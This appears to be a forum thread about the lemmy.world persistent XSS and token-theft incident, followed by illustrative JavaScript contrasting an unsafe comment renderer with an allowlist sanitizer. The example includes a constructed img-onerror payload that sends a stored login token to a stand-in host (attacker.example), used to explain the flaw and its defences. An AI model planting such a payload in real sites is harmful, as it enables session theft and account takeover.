Went there and got some… less than savory images. Do not recommend going there.

Did it get hacked or smth?

  • 0xtero@kbin.social · 11 upvotes · edited · 1 year ago

    Looks like the Lemmy code has a security vulnerability, a persistent XSS, that allows injection of JavaScript into the sidebar and comments. That allowed the attacker to force-load NSFW content even after lemmy.world admins cleaned up the first attack.

    There might have also been an admin account compromise at lemmy.world involved. Time will tell if these are related.

    Edit: Looks like the injected JS code also steals login tokens from your browser, so that explains the admin compromise. Probably a good idea to not visit Lemmy sites for the time being (or block JavaScript in your browser, which is always a good idea).

    • therealpygon@kbin.social · 2 upvotes · 1 year ago

      Gee, who could have thought that allowing HTML in posts could be a bad idea? -Every developer that has ever looked at OWASP.
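As an added illustration of the two comments above (this is example code, not Lemmy's code, and not the payload that was used against lemmy.world): a comment renderer that drops the stored body into the page as raw HTML beside one that passes it through a small allowlist sanitizer. The host `attacker.example` and the `localStorage` key `jwt` are assumptions made up for the example.

```javascript
// Added example (not Lemmy's code, and not the payload used against lemmy.world).
// Shows why rendering a comment body as raw HTML is a persistent XSS, and a
// minimal allowlist sanitizer that strips the tags and attributes that carry script.
// Hypothetical names: attacker.example, the localStorage key "jwt".

const ALLOWED_TAGS = new Set(['p', 'br', 'b', 'i', 'em', 'strong', 'code', 'pre', 'a']);
const ALLOWED_ATTRS = { a: new Set(['href']) };

// Escape the five characters that can change HTML context.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => (
    { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]
  ));
}

// Accept only http(s)/mailto or relative URLs. Control characters are removed
// first because browsers ignore them when parsing a scheme ("java\tscript:").
function safeUrl(v) {
  const cleaned = v.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
  if (!m) return true;
  return ['http', 'https', 'mailto'].includes(m[1]);
}

// Keep only allowlisted attributes; every on* handler, style, src, etc. is dropped.
function filterAttrs(tag, raw) {
  const allowed = ALLOWED_ATTRS[tag];
  if (!allowed) return '';
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let out = '';
  let m;
  while ((m = attrRe.exec(raw)) !== null) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? '';
    if (!allowed.has(name)) continue;
    if (name === 'href' && !safeUrl(value)) continue;
    out += ` ${name}="${escapeHtml(value)}"`;
  }
  return out;
}

// Allowlist sanitizer: text outside tags is escaped, tags not on the list are
// removed (their text content is kept), surviving tags are re-emitted with
// filtered attributes. A regex pass like this is for illustration only; use a
// parser-based library such as DOMPurify in production.
function sanitize(html) {
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
  let out = '';
  let last = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out += escapeHtml(html.slice(last, m.index));
    last = tagRe.lastIndex;
    const closing = m[1] === '/';
    const name = m[2].toLowerCase();
    if (!ALLOWED_TAGS.has(name)) continue;
    out += closing ? `</${name}>` : `<${name}${filterAttrs(name, m[3])}>`;
  }
  return out + escapeHtml(html.slice(last));
}

// Vulnerable: the stored comment body lands in the DOM verbatim, so any tag
// the poster wrote runs for every later viewer (persistent XSS).
function renderCommentUnsafe(body) {
  return `<div class="comment">${body}</div>`;
}

// Fixed: the same body passed through the allowlist.
function renderCommentSafe(body) {
  return `<div class="comment">${sanitize(body)}</div>`;
}

// Constructed payload of the kind the thread describes: on render it ships a
// script-readable token to a host the attacker controls. It gets nothing if the
// token lives in an HttpOnly cookie, which script cannot read.
const PAYLOAD = '<img src=x onerror="new Image().src=\'https://attacker.example/?t=\'+localStorage.getItem(\'jwt\')">Nice post';

console.log(renderCommentUnsafe(PAYLOAD)); // the onerror handler reaches the viewer's browser
console.log(renderCommentSafe(PAYLOAD));   // <div class="comment">Nice post</div>
```

Two checks worth making on any site that renders user markup: the Markdown renderer should have raw HTML disabled or its output sanitized after rendering, and the session token should be stored where script cannot reach it (an HttpOnly cookie) so that an injection that does slip through cannot exfiltrate it. A Content-Security-Policy without `unsafe-inline` blocks the inline `onerror` handler as a further layer.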